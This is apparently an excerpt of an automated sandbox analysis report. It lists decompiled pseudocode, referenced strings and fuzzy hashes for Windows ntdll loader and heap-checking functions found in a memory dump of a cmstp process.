Instruction Fuzzy Hash: 1161BF746003419FDB28DF24E585BAEBBE6FF44304F24856DE95A8B641D770E882CF91

Uniqueness

Uniqueness Score: -1.00%

Function 050E7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E050E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E050ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E050DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x51c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05155510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x51c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E050F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E050F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05157016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E050F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E050F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05157016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0510A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E050DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x050e7e4c
0x050e7e50
0x050e7e55
0x050e7e58
0x050e7e5d
0x050e7e71
0x050e7f33
0x050e7e77
0x050e7e77
0x050e7e79
0x050e7e79
0x050e7e7e
0x050e7f45
0x05139848
0x00000000
0x05139848
0x050e7f4e
0x050e7f53
0x050e7f5a
0x00000000
0x00000000
0x0513985a
0x05139862
0x05139866
0x00000000
0x0513986c
0x00000000
0x0513986c
0x050e7e84
0x050e7e84
0x050e7e8d
0x05139871
0x050e7eb8
0x050e7ec0
0x050e7ec0
0x050e7e9a
0x0513987e
0x00000000
0x00000000
0x05139884
0x0513988b
0x051398a7
0x051398ac
0x051398b1
0x051398b6
0x051398b8
0x051398b8
0x051398b9
0x00000000
0x051398b9
0x050e7ea0
0x050e7ea7
0x00000000
0x00000000
0x050e7eac
0x050e7eb1
0x050e7ec6
0x050e7ed0
0x051398cc
0x050e7ed6
0x050e7ed6
0x050e7ed6
0x050e7ede
0x050e7ee3
0x051398e3
0x051398f0
0x05139902
0x051398f2
0x051398fb
0x051398fb
0x05139907
0x0513991d
0x0513991d
0x05139907
0x051398e3
0x050e7ef0
0x050e7f14
0x050e7f14
0x050e7f1e
0x05139946
0x050e7f24
0x050e7f24
0x050e7f24
0x050e7f2c
0x0513996a
0x05139975
0x05139975
0x0513997e
0x05139993
0x05139993
0x0513997e
0x00000000
0x050e7ef2
0x050e7efc
0x050e7f0a
0x050e7f0e
0x05139933
0x00000000
0x05139933
0x00000000
0x050e7f0e
0x00000000
0x00000000
0x00000000
0x050e7eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 05139891
minkernel\ntdll\ldrmap.c, xrefs: 051398A2
LdrpCompleteMapModule, xrefs: 05139898

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: adff26d08b4baa01c4184a1219a68e9991c634bb932433eb99e3b31e73cd4fe6
Instruction ID: b5cd45f7ad740499c96becae7bcac66ef5157965827b64e675db2ae6a3954c9b
Opcode Fuzzy Hash: adff26d08b4baa01c4184a1219a68e9991c634bb932433eb99e3b31e73cd4fe6
Instruction Fuzzy Hash: F85122316047849FEB29CF68E889B6EBBE5FB44310F240699E8529B7D1D770ED00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 051823E3 Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E051823E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x51c874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x51c874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0512D4F0(_t83, 0x50b6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E050DB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x51c6378 = 1;
						asm("int3");
						 *0x51c6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x051823e3
0x051823e8
0x051823eb
0x051823ee
0x051823f3
0x0518259b
0x0518259b
0x0518259d
0x051825a3
0x051825a3
0x051823fb
0x05182424
0x0518244f
0x05182460
0x05182451
0x05182451
0x05182456
0x05182458
0x05182458
0x0518245b
0x0518245b
0x05182426
0x05182431
0x05182436
0x05182443
0x05182438
0x05182438
0x05182438
0x05182445
0x05182445
0x05182463
0x05182469
0x0518246f
0x05182480
0x05182495
0x051824a1
0x051824ce
0x051824df
0x051824d0
0x051824d0
0x051824d5
0x051824d7
0x051824d7
0x051824da
0x051824da
0x051824a3
0x051824b0
0x051824b5
0x051824c2
0x051824b7
0x051824b7
0x051824b7
0x051824c4
0x051824c4
0x051824e8
0x05182497
0x0518249a
0x0518249a
0x05182482
0x05182488
0x05182488
0x05182471
0x05182479
0x05182479
0x051824ef
0x051823fd
0x05182401
0x05182412
0x05182403
0x05182403
0x05182408
0x0518240a
0x0518240a
0x0518240d
0x0518240d
0x0518241b
0x0518241b
0x051824f1
0x051824f6
0x05182507
0x05182510
0x00000000
0x05182510
0x0518250b
0x00000000
0x051824f8
0x051824f8
0x051824fc
0x05182500
0x05182512
0x05182515
0x0518251a
0x05182521
0x05182524
0x05182529
0x0518252f
0x00000000
0x00000000
0x0518253c
0x0518255c
0x05182561
0x0518253e
0x05182554
0x05182559
0x0518256a
0x0518256d
0x05182574
0x05182586
0x05182588
0x0518258f
0x05182590
0x05182590
0x05182597
0x00000000
0x05182597

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 0518256F
HEAP[%wZ]: , xrefs: 0518254F
HEAP: , xrefs: 0518255C

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: b6f36eed6c0bcabf1ee7a347794a0c2582a08516335afc6c5e5d8978c35f7b2a
Instruction ID: d5fb6ba08ed1321d9c2f7674a31fa3fd592191e004a17329a450c9cd1254a8b1
Opcode Fuzzy Hash: b6f36eed6c0bcabf1ee7a347794a0c2582a08516335afc6c5e5d8978c35f7b2a
Instruction Fuzzy Hash: 9451283C2042508AE37AEE19C8487B277E2EB44644F564859E8E78B385D776DC47DF30

Uniqueness

Uniqueness Score: -1.00%

Function 050DE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E050DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E050DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E051195D0();
						}
						if(_t78 != 0) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0511FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0511BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05119600();
					if(_t97 < 0) {
						goto L6;
					}
					E0511BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L050DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0511BB40(_t83, _t102 + 0x24, _t78);
								if(L050E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0511BB40(_t84, _t102 + 0x24, _t94);
									if(L050E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x050de620
0x050de628
0x050de62f
0x050de631
0x050de635
0x050de637
0x050de63e
0x05135503
0x05135503
0x050de64c
0x050de64c
0x050de651
0x00000000
0x00000000
0x050de661
0x050de665
0x0513542a
0x050de715
0x050de71a
0x050de71c
0x050de720
0x050de720
0x050de727
0x050de736
0x050de736
0x050de743
0x050de743
0x050de673
0x050de678
0x050de67d
0x050de682
0x050de685
0x050de692
0x050de69b
0x050de6a3
0x050de6ad
0x050de6b1
0x050de6b2
0x050de6bb
0x050de6bf
0x050de6c0
0x050de6c8
0x050de6cc
0x050de6d5
0x050de6d9
0x00000000
0x00000000
0x050de6e5
0x050de6ea
0x050de6f9
0x050de70b
0x050de70f
0x05135439
0x0513545e
0x0513545e
0x00000000
0x0513545e
0x0513543b
0x0513543e
0x05135440
0x05135445
0x05135472
0x05135475
0x0513548d
0x05135493
0x051354a9
0x00000000
0x00000000
0x051354ab
0x051354b4
0x051354bc
0x051354c8
0x051354de
0x051354fb
0x051354e0
0x051354e6
0x051354eb
0x051354eb
0x051354de
0x00000000
0x051354bc
0x05135477
0x0513547a
0x05135480
0x05135483
0x05135486
0x0513548b
0x00000000
0x00000000
0x00000000
0x0513548b
0x00000000
0x00000000
0x00000000
0x00000000
0x05135447
0x05135447
0x05135447
0x05135447
0x0513544e
0x00000000
0x00000000
0x05135450
0x05135452
0x05135455
0x0513545a
0x00000000
0x00000000
0x00000000
0x0513545c
0x0513546a
0x0513546d
0x0513546f
0x00000000
0x0513546f
0x050de70f

Strings

@, xrefs: 050DE6C0
InstallLanguageFallback, xrefs: 050DE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 050DE68C

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: b092befbd7c93ba879c55f89e1286f29a4e591de40382b37bd1c13c3f5a5c3aa
Instruction ID: 41c2127e07d73a14025adaed925a8bf83dba5eb015bb08c2a751d576874454f2
Opcode Fuzzy Hash: b092befbd7c93ba879c55f89e1286f29a4e591de40382b37bd1c13c3f5a5c3aa
Instruction Fuzzy Hash: 3151A0726083459BC754DF24D494AAFB3E9BF88A14F06096EF98AE7240F734DD04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 050FEB9A Relevance: 3.9, Strings: 3, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E050FEB9A(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				signed int _t63;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t77;
				signed int* _t91;
				intOrPtr _t92;
				signed int _t95;
				signed char _t109;
				signed int _t114;
				unsigned int _t119;
				intOrPtr* _t122;
				intOrPtr _t127;
				signed int _t130;
				void* _t135;

				_t92 = __ecx;
				_t122 = __edx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
				if( *__edx != 0) {
					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
					__eflags =  *(__edx + 8);
					if(__eflags != 0) {
						_t95 = _t95 + _t95;
					}
					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
					asm("btr eax, esi");
					_t92 = _v8;
				}
				_t62 = _t92 + 0xc0;
				_t127 =  *((intOrPtr*)(_t62 + 4));
				while(1) {
					L2:
					_v12 = _t127;
					if(_t62 == _t127) {
						break;
					}
					_t7 = _t127 - 8; // -8
					_t91 = _t7;
					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
						_t119 =  *(_t92 + 0x50) ^  *_t91;
						 *_t91 = _t119;
						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
						if(_t119 >> 0x18 != _t109) {
							_push(_t109);
							E0518FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
						}
						_t92 = _v8;
					}
					_t114 =  *_t91 & 0x0000ffff;
					_t63 = _t122;
					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
					while(1) {
						_v20 = _t63;
						if(_t135 < 0) {
							break;
						}
						_t130 =  *_t63;
						_v16 = _t130;
						_t127 = _v12;
						if(_t130 != 0) {
							_t63 = _v16;
							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
							continue;
						}
						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
						L10:
						if( *_t122 != 0) {
							_t64 =  *((intOrPtr*)(_t122 + 4));
							__eflags = _t114 - _t64;
							_t65 = _t64 - 1;
							__eflags = _t65;
							if(_t65 < 0) {
								_t65 = _t114;
							}
							E050FBC04(_t92, _t122, 1, _t127, _t65, _t114);
						}
						E050FE4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
						if( *0x51c8748 >= 1) {
							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
							if(__eflags == 0) {
								_t77 =  *[fs:0x30];
								__eflags =  *(_t77 + 0xc);
								if( *(_t77 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E050DB150();
								__eflags =  *0x51c7bc8;
								if(__eflags == 0) {
									__eflags = 1;
									E05192073(_t91, 1, _t122, 1);
								}
							}
							_t127 = _v12;
						}
						_t92 = _v8;
						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
						}
						_t127 =  *((intOrPtr*)(_t127 + 4));
						_t62 = _t92 + 0xc0;
						goto L2;
					}
					_v16 = _t114;
					goto L10;
				}
				return _t62;
			}

0x050feb9a
0x050feba5
0x050feba7
0x050febaa
0x050febb3
0x050feca0
0x050feca1
0x050feca5
0x050fecd1
0x050fecd1
0x050fecaa
0x050fecc3
0x050fecc9
0x050fecc9
0x050febb9
0x050febbf
0x050febc2
0x050febc2
0x050febc2
0x050febc7
0x00000000
0x00000000
0x050febd1
0x050febd1
0x050febd4
0x050febd9
0x050febdd
0x050febe9
0x050febf0
0x05144258
0x0514425e
0x0514425e
0x050febf6
0x050febf6
0x050febf9
0x050febfc
0x050febfe
0x050fec01
0x050fec01
0x050fec04
0x00000000
0x00000000
0x050fec0a
0x050fec0e
0x050fec11
0x050fec14
0x050fec8f
0x050fec92
0x00000000
0x050fec92
0x050fec1a
0x050fec1d
0x050fec20
0x050fec72
0x050fec75
0x050fec77
0x050fec77
0x050fec78
0x050fec7a
0x050fec7a
0x050fec83
0x050fec83
0x050fec32
0x050fec3e
0x05144281
0x05144284
0x05144286
0x0514428c
0x05144290
0x051442af
0x051442b4
0x05144292
0x051442a7
0x051442ac
0x051442ba
0x051442bf
0x051442c4
0x051442cc
0x051442d0
0x051442d1
0x051442d1
0x051442cc
0x051442d6
0x051442d6
0x050fec44
0x050fec4b
0x050fec55
0x050fec5b
0x050fec5b
0x050fec5d
0x050fec60
0x00000000
0x050fec60
0x050fec8a
0x00000000
0x050fec8a
0x050fec71

Strings

HEAP[%wZ]: , xrefs: 051442A2
HEAP: , xrefs: 051442AF
RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 051442BA

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
API String ID: 0-1596344177
Opcode ID: f644183efeca390598f73cc6fb9aa5d92057e7527ca56a6d486306ccbaf31ad9
Instruction ID: 9dd9de5a83b1532bbf7e4398edde391698e01eb176f42ff42f421d63ece2619a
Opcode Fuzzy Hash: f644183efeca390598f73cc6fb9aa5d92057e7527ca56a6d486306ccbaf31ad9
Instruction Fuzzy Hash: 4D51DC30A00615EFCB58DF58E484B7EBBFAFB84304F1580A9E9059B652C771A942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050FB8E4 Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E050FB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x51c8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E050DB150();
						} else {
							E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E050DB150();
						__eflags =  *0x51c7bc8;
						if(__eflags == 0) {
							E05192073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E050FAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x050fb8f0
0x050fb8f2
0x050fb8f4
0x05142c4e
0x05142c50
0x05142c56
0x05142c5c
0x05142c60
0x05142c7f
0x05142c84
0x05142c62
0x05142c77
0x05142c7c
0x05142c8a
0x05142c8f
0x05142c94
0x05142c9c
0x05142ca5
0x05142ca5
0x05142c9c
0x05142c50
0x050fb8fa
0x050fb902
0x050fb921
0x050fb921
0x050fb924
0x050fb924
0x050fb927
0x00000000
0x00000000
0x050fb929
0x050fb92b
0x050fb92d
0x050fb940
0x00000000
0x050fb940
0x050fb932
0x050fb932
0x00000000
0x050fb932
0x00000000
0x050fb904
0x050fb904
0x050fb90a
0x050fb90c
0x050fb916
0x050fb919
0x050fb915
0x050fb915
0x050fb91b
0x050fb91b
0x00000000
0x050fb910

Strings

HEAP[%wZ]: , xrefs: 05142C72
HEAP: , xrefs: 05142C7F
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 05142C8A

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

